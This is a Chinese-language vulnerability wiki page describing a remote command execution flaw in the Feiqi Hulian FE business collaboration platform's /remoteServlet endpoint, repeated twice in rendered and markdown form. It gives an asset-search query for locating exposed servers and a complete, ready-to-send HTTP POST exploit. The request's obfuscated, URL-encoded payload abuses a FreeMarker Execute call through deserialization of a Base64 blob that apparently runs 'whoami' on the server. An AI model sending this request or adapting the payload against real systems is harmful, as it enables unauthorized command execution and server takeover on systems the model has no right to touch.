fofamini-wiki

登录白背景

源码

飞企互联FE业务协作平台remoteServlet存在远程命令执行漏洞

一、漏洞简介

FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联FE业务协作平台remoteServlet存在远程命令执行漏洞，攻击者可通过该漏洞获取服务器权限。。

二、影响版本

飞企互联FE业务协作平台

三、资产测绘

hunterapp.name=="飞企互联 FE 6.0+"||app.name=="飞企互联 FE"
登录页面

四、漏洞复现

POST /remoteServlet HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 840
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Upgrade-Insecure-Requests: 1

obj=weChatService&method=loginService&onBeforeServerEvent=%66%72%0a%65%65%0a%6d%61%72%0a%6b%0a%65%72%2e%74%65%6d%70%6c%61%74%0a%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%0a%75%74%65%2e%65%0a%78%65%63(%6f%0a%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%0a%2e%6c%61%0a%6e%67%2e%0a%53%65%72%69%61%6c%69%7a%61%74%69%0a%6f%6e%55%0a%74%69%6c%73%2e%64%65%0a%73%0a%65%72%69%61%6c%0a%69%7a%65(%6a%63%69%66%73%2e%75%74%69%6c%2e%42%61%73%65%36%34%0a%2e%64%65%63%6f%64%0a%65(%72%4f%30%41%42%58%4e%79%41%0a%42%4e%71%59%0a%58%5a%68%4c%6e%56%30%61%57%77%75%51%58%4a%79%59%58%6c%4d%61%58%4e%30%65%49%48%53%48%5a%6e%48%59%5a%30%44%41%41%46%4a%41%41%52%7a%61%58%70%6c%65%48%41%41%41%41%41%42%64%77%51%41%41%41%41%42%64%41%41%52%59%32%31%6b%4c%6d%56%34%5a%53%41%76%59%79%42%33%61%47%39%68%62%57%6c%34)))&returnEventData=true&count=2&param1=1&param2=MQ==

原文: https://www.yuque.com/xiaokp7/ocvun2/mt6gefbpynm2a5ec

# 飞企互联FE业务协作平台remoteServlet存在远程命令执行漏洞

# 一、漏洞简介
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联FE业务协作平台remoteServlet存在远程命令执行漏洞，攻击者可通过该漏洞获取服务器权限。。

# 二、影响版本

- 飞企互联FE业务协作平台

# 三、资产测绘

- hunter`app.name=="飞企互联 FE 6.0+"`||`app.name=="飞企互联 FE"`
- 登录页面

![image.png](./img/8ISk2ti0ZnOvoMOa/1692266465639-4e39b2e2-11b3-413b-a119-1c569b2deb21-538487.png)

# 四、漏洞复现
```
POST /remoteServlet HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 840
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Upgrade-Insecure-Requests: 1

obj=weChatService&method=loginService&onBeforeServerEvent=%66%72%0a%65%65%0a%6d%61%72%0a%6b%0a%65%72%2e%74%65%6d%70%6c%61%74%0a%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%0a%75%74%65%2e%65%0a%78%65%63(%6f%0a%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%0a%2e%6c%61%0a%6e%67%2e%0a%53%65%72%69%61%6c%69%7a%61%74%69%0a%6f%6e%55%0a%74%69%6c%73%2e%64%65%0a%73%0a%65%72%69%61%6c%0a%69%7a%65(%6a%63%69%66%73%2e%75%74%69%6c%2e%42%61%73%65%36%34%0a%2e%64%65%63%6f%64%0a%65(%72%4f%30%41%42%58%4e%79%41%0a%42%4e%71%59%0a%58%5a%68%4c%6e%56%30%61%57%77%75%51%58%4a%79%59%58%6c%4d%61%58%4e%30%65%49%48%53%48%5a%6e%48%59%5a%30%44%41%41%46%4a%41%41%52%7a%61%58%70%6c%65%48%41%41%41%41%41%42%64%77%51%41%41%41%41%42%64%41%41%52%59%32%31%6b%4c%6d%56%34%5a%53%41%76%59%79%42%33%61%47%39%68%62%57%6c%34)))&returnEventData=true&count=2¶m1=1¶m2=MQ==
```
![image.png](./img/8ISk2ti0ZnOvoMOa/1705071174894-c0febc26-ab5b-447f-bf4a-15dc7abf39f6-070515.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mt6gefbpynm2a5ec>